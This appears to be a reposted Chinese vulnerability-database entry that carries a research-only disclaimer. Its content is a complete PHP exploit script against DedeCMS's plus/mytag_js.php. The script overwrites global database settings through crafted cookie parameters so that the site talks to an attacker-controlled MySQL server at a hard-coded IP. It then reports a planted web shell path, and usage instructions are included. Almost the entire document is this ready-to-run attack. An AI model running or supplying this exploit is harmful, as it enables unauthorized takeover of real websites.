测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- #!usr/bin/php -w
- <?php
- error_reporting(E_ERROR);
- set_time_limit(0);
- print_r('
- DEDEcms Variable Coverage
- Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]
- );
- echo " ";
- if($argv[2]==null){
- print_r('
- +---------------------------------------------------------------------------+
- Usage: php '.$argv[0].' url aid path
- aid=1 shellpath /data/cache aid=2 shellpath=/ aid=3 shellpath=/plus/
- Example:
- php '.$argv[0].'[url]www.site.com[/url] 1 old
- +---------------------------------------------------------------------------+
- ');
- exit;
- }
- $url=$argv[1];
- $aid=$argv[2];
- $path=$argv[3];
- $exp=Getshell($url,$aid,$path);
- if (strpos($exp,"OK")>12){
- echo "[*] Exploit Success ";
- if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php " ;
- if($aid==2)echo "[*]Shell:".$url."/$path/fuck.php " ;
- if($aid==3)echo "[*]Shell:".$url."/$path/plus/fuck.php ";
- }else{
- echo "[*]ExploitFailed ";
- }
- function Getshell($url,$aid,$path){
- $id=$aid;
- $host=$url;
- $port="80";
- $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
- $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1 ";
- $data .= "Host:".$host." ";
- $data .= "User-Agent:Mozilla/5.0(Windows NT 5.2; rv:5.0.1)Gecko/20100101Firefox/5.0.1 ";
- $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 ";
- $data .= "Accept-Language: zh-cn,zh;q=0.5 ";
- //$data .= "Accept-Encoding: gzip,deflate ";
- $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7 ";
- $data .= "Connection: keep-alive ";
- $data .= "Content-Type: application/x-www-form-urlencoded ";
- $data .= "Content-Length: ".strlen($content)." ";
- $data .= $content." ";
- $ock=fsockopen($host,$port);
- if (!$ock) {
- echo "[*] No response from ".$host." ";
- }
- fwrite($ock,$data);
- while (!feof($ock)) {
- $exp=fgets($ock, 1024);
- return $exp;
- }
- }
- ?>
- 摘自:http://sebug.net/vuldb/ssvid-20949